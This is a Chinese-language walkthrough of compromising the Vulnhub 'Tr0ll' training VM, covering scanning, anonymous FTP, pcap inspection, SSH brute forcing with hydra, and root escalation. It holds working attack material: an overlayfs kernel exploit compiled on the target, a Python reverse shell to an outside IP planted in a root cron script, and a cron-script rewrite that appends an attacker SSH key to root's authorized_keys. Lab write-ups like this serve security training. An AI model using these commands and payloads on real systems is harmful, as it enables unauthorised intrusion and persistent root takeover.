【Vulnhub】Tr0ll
nmap -p- -A 192.168.149.174
访问一下 80 端口,只有一张图片
访问了一下 robots.txt 得到了一个 /secret 目录
去访问一下仍然只有一张图片
之前 nmap 扫端口的时候,说了可以匿名登录 ftp
以及还有个流量包 lol.pcap
直接连接上去
从这个流量包里面拿到了 ftp 的一组用户名和密码 anonymous/password
还有这样一组信息
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n
去访问一下目录试试
这竟然是一个 ELF 文件,执行一下试试
又得到一个路径 0x0856BF,再去访问一下
good_luck 目录中有个 txt,作为用户名
this_folder_contains_the_password 目录中有个 pass.txt
然而这个文件名就是 password
爆破一下 ssh
hydra -L user.txt -w 10 -P pass.txt -t 10 -v 192.168.149.174 ssh
-L user.txt 指定爆破账号字典为 user.txt
-w 10 设置最大超时时间10s,默认30s
-P pass.txt 指定密码字典为 pass.txt
-t 10 指定爆破线程为 10 个
-v 指定显示爆破过程
拿到一对:overflow/Pass.txt
有几种提权方法:
overlayfs本地提权
查看内核版本:uname -a
直接搜一下提权的脚本
复制出来
cp /usr/share/exploitdb/exploits/linux/local/37292.c hack.c
在目标机器上复制上,然后编译好
gcc hack.c -o hack
./hack 就拿到了 root 权限
反弹shell提权
连上之后发现过一段时间就会断开,系统有个计划任务,查找一下日志
cat /var/log/cronlog
发现是一个 cleaner.py 的文件,find 查找一下
内容如下
把他改一下,改成
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.149.141",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
#用https://krober.biz/misc/reverse_shell.php生成的
覆盖ssh提权
先在 kali 上生成公钥
然后查看一下,把这个复制出来
然后再把那个 cleaner.py 给写为:
#!/usr/bin/env python
import os
import sys
try:
os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDGfjWcCnu2Mi8Op+LBy3HoDYYAaiOoNhfA9W0TMO6kjCvYhjBp62xzu7tWAbm9+EPGLzZ6AmDG0znEyEVpHFgk5dWOak4VYkDX50FXbRPshgQZY4c9RfbNA3Th7dSuFo8m7rWNbMkqxC5KBnTjkek7d20uI3CBPIdRFmjg8cD03Q62DMaxbuE0tIF5nUK65ubltt5blRlWsSKBiELerk7q6Ru5qUnOIjfmefwzFfgvH7QeRT7bZyttytVcG7PqlKXL/Sh2oEOTcgYJmOqWuKaDJqXiY5/9XVEMm+nF4Y19ytAgHNquDv5RUgAC1+5gNaG/gCtaYRxoZbRy1JcFzM5EQ0RK37kEO6mTm+AzRzwvEew2h+Byci1/jffI5OuqM6QFLnaUq/Kxb2yWf7l6Bwfq+nI1kM7n8YPdGF2jL06V2Teo+yUewnGCDbcvhNXm4ryi66vYJfXmNz668dAISYI/821+i/eRKQO5Sv8Eje2a4Y136etzIwQYWaHpYuhwSQc= root@yichen" >> /root/.ssh/authorized_keys')
except:
sys.exit()
要记得把 id_rsa 复制到 /root/.ssh/ 这里
还有很多,但都是用那个脚本配合的
参考:
https://blog.csdn.net/weixin_44214107/article/details/100742919